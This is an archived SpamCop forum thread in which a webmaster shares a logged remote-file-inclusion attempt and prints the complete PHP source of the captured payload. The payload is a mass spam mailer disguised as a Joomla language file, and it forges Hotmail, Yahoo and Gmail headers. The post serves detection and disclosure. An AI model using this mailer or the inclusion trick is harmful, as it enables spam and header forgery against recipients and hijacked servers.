Jump to content

Server side reporting tool for hacking attempts in realtime

T-Qualizer.com

By T-Qualizer.com
in Geek/Tech Things

Recommended Posts

T-Qualizer.com Newbie

T-Qualizer.com

Posted
Posted

On my websites, I'm running a small detection tool for php-code injections. It automatically donwloads the file, the hacker tries to include.

Below I show you a real example from my log files and the downloaded spammer tool. This stuff makes clear where the increased spamruns of the last time come from.

My suggestion is to offer my detection tool as an opensource project and expand it to a realtime reporting tool that's able to report this attempts straight to SpamCop. Off course this requires also a SpamCop-side tool to recieve them. As opensource project it may be expanded to a complete honeypot to detect and eleminate spamruns before they have done their job.

Here is a example of a nice hacker spam action, real happend and logged from my website. Nothing is faked or changed.

Requested URL on 2009-12-29 at 21:56 gmt, from IP [82.155.84.123] (bl6-84-123.dsl.telepac.pt):

www.t-qualizer.eu/index.php?sessid=y1ufj9funveq5dw50l〈=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

You can see that the hacker tried to include a url in the hope that it will be executed.

Here comes the scri_pt, downloaded by my detection tool from:

www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

At the time I'm writing this post, 11 day's later, it's still online!

<html>
<head>
<title>35437282898562626475892888</title>
<style type="text/css">
<!--
.cxtexto {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	border: thin #000000;
	background-color: #FFFFFF;
	color: #000000;
}
-->
</style>
</head>
</div>
		<table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1">
		  <form name="form1" method="post" action="" enctype="multipart/form-data">
		  <input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3">
			<tr>
				<td colspan="4" valign="top">  </td>
				</tr>
			<tr>
				<td valign="top"> <div align="right">
					<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
					<strong>nome</strong></font></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				email</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td>
				</tr>
			<tr>
				<td valign="top" colspan="4" height="2"></td>
				</tr>
			<tr>
				<td valign="top"> <div align="right"><strong>
					<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
					assunto</font></strong></div>
				</td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				lista</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC" class="cxprocura">   <input name="emails" type="file" class="cxtexto" id="emails"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top" height="2"></td>
				</tr>
			<tr>
				<td colspan="2" valign="top"> <div align="center">
				<strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo 
				</strong></font>
				<input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3">
				<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
				<strong>segundos</strong></font></div></td>
			<td colspan="2" valign="middle" bgcolor="#CCCCCC">  
		  <p align="center">  
		  <input type="submit" name="Submit2" value="enviar">  
		  <input name="Submit" type="button" onClick='window.close()' value="desistir"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top"> 
				<p align="center"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td>
			</tr>
			<tr>
				<td colspan="4" align="center">
				<p align="center"> 
				<textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td>
			</tr>
			<tr>
				<td colspan="4" valign="top">
				 </td>
			</tr>
			 </form>
		</table>
<?php //Source PHP

//Para melhor 'debuging'
//error_reporting(E_ALL);
[at]ignore_user_abort(TRUE);
error_reporting(0);
[at]set_time_limit(0);
ini_set("memory_limit", "-1");

//Verifica se os dados foram preenchidos
$teste = $_POST['teste'];
If ($teste == null) {
	exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/);
}

//Recupera os dados do FORM
$FromName = $_POST['NRemetente'];
$FromMail = $_POST['ERemetente'];
$Subject = $_POST['Assunto'];
$MailServer = explode("[at]",$FromMail,2); $MailServer = $MailServer['1'];
$arq_name = $_FILES["emails"]["name"];
$arq_temp = $_FILES["emails"]["tmp_name"];
$Lista = (file($arq_temp));
$QtdMail = count($Lista);
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];
$ip = gethostbyname($MailServer);

//Arquivos de configuracao
[at]ini_set("sendmail_from", $FromMail);
[at]ini_set("time_limit",0);


//Define os headers do email
//	$headers  = "From: $FromName <$FromMail>\n";
//	$headers .= "MIME-Version: 1.0\n";
//	$headers .= "Content-type: text/html; charset=iso-8859-1\n";
//	$headers .= "Content-Transfer-encoding: 8bit\n";
//	$headers .= "Reply-To: $FromName <$FromMail>\n";
//	$headers .= "Return-Path: $FromMail\n";
//	$headers .= "Message-ID: <".md5(uniqid(time()))."[at]$MailServer>\n";
//	$headers .= "X-Priority: 3\n";
//	$headers .= "X-MSmail-Priority: High\n";
//	$headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";
//	$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";
//	$headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
//	$headers .= "X-Originating-Email: [$FromName]\n";
//	$headers .= "X-Sender: $FromName\n";
//	$headers .= "X-Originating-IP: [201.201.120.121]\n";
//	$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";


//Inicia o envio
If ($QtdMail <= 1) {
	exit;
} else {
	echo str_repeat("-", 126)."<br>";
	echo "<b>De:</b> $FromName <$FromMail><br>";
	echo "<b>Assunto:</b> $Subject<br>";
	echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>";
	echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>";
	echo str_repeat("-", 126)."<br>";
}

$error = 0;
$donen = 0;

while (list($pos, $val) = each($Lista)) {
	$val = trim($val);


	if (strstr(strtolower(htmlentities($val)), 'yahoo') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA GMAIL \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mta269.mail.re4.yahoo.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mta269.mail.re4.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mta269.mail.re4.yahoo.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA YAHOO \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'yahoo') == '')
	  {
		 //echo "\r\n ENTRA HOTMAIL \r\n";
		 $ip1 = gethostbyname('mta269.mail.re4.yahoo.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=yahoo.com; domainkeys=neutral (no sig); from=yahoo.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO mta269.mail.re4.yahoo.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by mta269.mail.re4.yahoo.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }

	if (mail($val, $Subject, $Conteudo, $headers)) {
			$donen++;
			echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	} else {
			$error++;
			echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	}

	$headers = "";

	echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>';
	sleep($IntervalX);
}

unlink($arq_temp);

?>

</body>
</html>

If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.

Link to comment
Share on other sites
Wazoo What Life?

Wazoo

Posted
Posted
My suggestion is to offer my detection tool as an opensource project and expand it to a realtime reporting tool that's able to report this attempts straight to SpamCop. Off course this requires also a SpamCop-side tool to recieve them. As opensource project it may be expanded to a complete honeypot to detect and eleminate spamruns before they have done their job.

I do not see any connecton to the core of the SpamCop mission and tool-set. Hacking of a web-site is nowhere near the 'sending spam e-mail" action. Moving this from the "New Feature Request" Forum section to the "Geek/Tech Things" Forum section with this Post.

At the time I'm writing this post, 11 day's later, it's still online!

Does one assume that you have this nifty detection tool, you've done this analysis and data capture but didn't report/complain about the actions and files involved to anyone? This would also forve one to ask why you Posted it all here in the first place, never mind that it has no relationship to what the SpamCop Parsing & Reporting system is all about ...???? Yes, I see that there is code there to try to send e-mail, but .... this would only happen after the succesful attack/exploit.

As your suggested exploit is geared towards Joomla (well, actually, what appears to be an exploited Joomla (using) site), I'd suggest you (and/or the site-owner) hit places such as http://secunia.com/advisories/product/ and check out the published advisories/warnings about exploit issues with that tool (I'd have offered up a more direct link, hut the Joomla+other looks prety extensive. Not in use here, so no idea whuch of those 'extensions' would be of interest in your case.)

On the other hand, are the redirscts on "your" site to mijndomein.nl some sort of indication that either your site has been hacked, or that there's simply some spamvertising involved here?

Link to comment
Share on other sites
kmolloy Member

kmolloy

Posted
Posted
On my websites, I'm running a small detection tool for php-code injections. It automatically donwloads the file, the hacker tries to include.

That looks very interesting, and I'd love to see the code. Could you mail me at deputies[at]spamcop.net, please? We would love to do more with malware detection.

Link to comment
Share on other sites
  • 2 months later...
QuantumMechanic Member

QuantumMechanic

Posted
Posted

http://dnsbl.abuse.ch/

it is nice list of website attacking ips - the list does not have All current active web hacking ips - but it is a very nice list to augment an htaccess file once an hour. (or use via dnslook ups in real time from an apache module etc).

It seems similar to what you propose T-equalizer. but perhaps not as open as you indicate your propsed system would be.

What language is your coding in.

Link to comment
Share on other sites
petzl Been There

petzl

Posted
Posted
If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.

Looks like SpamCop Admin is interested

http://forum.spamcop.net/forums/index.php?...ost&p=73722

The main strength in SpamCop is that it Automatically sends an "abuse" report to the listed owner of the IP

If you could do this also it would remove a lot of the trouble Bots cause

A very high percentage of ISP's do act responsibly to abuse reports and look into it.

Link to comment
Share on other sites
Wazoo What Life?

Wazoo

Posted
Posted
Looks like SpamCop Admin is interested

That is not "SpamCop Admin" .... I'd like to believe that the interest posted about was more 'personal' in nature, the Group icon being a bit of a distraction. However, I can't actually speak for her, and she basically doesn't talk to me.

Link to comment
Share on other sites
Lking What Life?

Lking

Posted
Posted

All kind of academic. If I read correctly the the person started this thread and then disappeared.

Seems odd, put their work in the public domain, ask for interest/input. When there was some, poof.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...